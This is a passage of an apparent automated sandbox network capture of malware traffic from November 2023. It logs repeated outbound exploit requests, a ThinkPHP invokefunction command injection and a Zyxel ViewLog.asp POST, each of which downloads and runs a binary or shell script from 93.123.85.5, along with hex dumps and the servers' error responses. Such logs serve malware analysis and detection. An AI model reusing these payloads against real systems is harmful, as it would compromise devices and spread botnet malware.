                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:54.334708929 CET20685OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              692192.168.2.2351568112.187.159.23080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:50.574408054 CET13632OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:50.882127047 CET13753INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:50 GMT
                                                              Server: WhoAmI?
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              693192.168.2.2337596112.126.208.23380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:50.580679893 CET13633OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:50.902549982 CET13754INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:52 GMT
                                                              Server: Apache
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              694192.168.2.2355716112.125.127.23780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:50.581299067 CET13634OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:50.902750015 CET13755INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:13:59 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              695192.168.2.2334142112.125.167.2580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:50.582129955 CET13634OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:50.902772903 CET13756INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:17:11 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              696192.168.2.2347380112.74.43.4480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:50.596434116 CET13635OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:51.622531891 CET13786INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:19:51 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              697192.168.2.2352030112.213.87.4580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:50.601521015 CET13636OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:50.938378096 CET13757INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:50 GMT
                                                              Server: Apache/2.4.18 (Ubuntu)
                                                              Content-Length: 301
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              69862.131.141.1858080192.168.2.2356502
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:51.058265924 CET13762INHTTP/1.0 400 Bad Request
                                                              Server: http server 1.0
                                                              Content-type: text/html
                                                              Date: Mon, 13 Nov 2023 21:19:40 GMT
                                                              Last-modified: Mon, 13 Nov 2023 21:19:40 GMT
                                                              Accept-Ranges: bytes
                                                              Connection: close
                                                              Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 20 75 72 6c 28 27 2f 63 67 69 2d 62 69 6e 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 2f 65 72 72 5f 62 67 2e 6a 70 67 27 29 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 6c 69 6e 6b 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 76 69 73 69 74 65 64 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 31 7b 0a 77 69 64 74 68 3a 20 39 38 30 70 78 3b 0a 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 42 43 42 43 42 43 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 5f 69 6d 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><link rel="shortcut icon" href="/images/favicon.gif" type="image/gif" /><link rel="icon" href="/images/favicon.gif" type="image/gif" /><style type="text/css">body{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;background: #FFFFFF url('/cgi-bin/images/error/err_bg.jpg');overflow: hidden;color: #A4A3A3;text-align: center;}.qnap_hyperlink a,.qnap_hyperlink a:link,.qnap_hyperlink a:visited{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;color: #A4A3A3;}.qnap_bar1{width: 980px;border-bottom: 1px solid #BCBCBC;padding-top: 10px;text-align: left;margin: 0 auto;}.qnap_bar_img{padding-botto


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              699192.168.2.234419631.207.34.1648080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:51.062673092 CET13771OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:51.366022110 CET13780INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:51 GMT
                                                              Server: Apache
                                                              Content-Length: 126
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                              Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              7192.168.2.234500688.99.231.6880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.050786018 CET429OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:01.364476919 CET434INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:15:16 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              70192.168.2.235786631.40.226.1448080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.074412107 CET2577OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:20.417182922 CET2587INHTTP/1.0 400 Bad Request
                                                              Server: squid/3.1.23
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 20:49:19 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3169
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 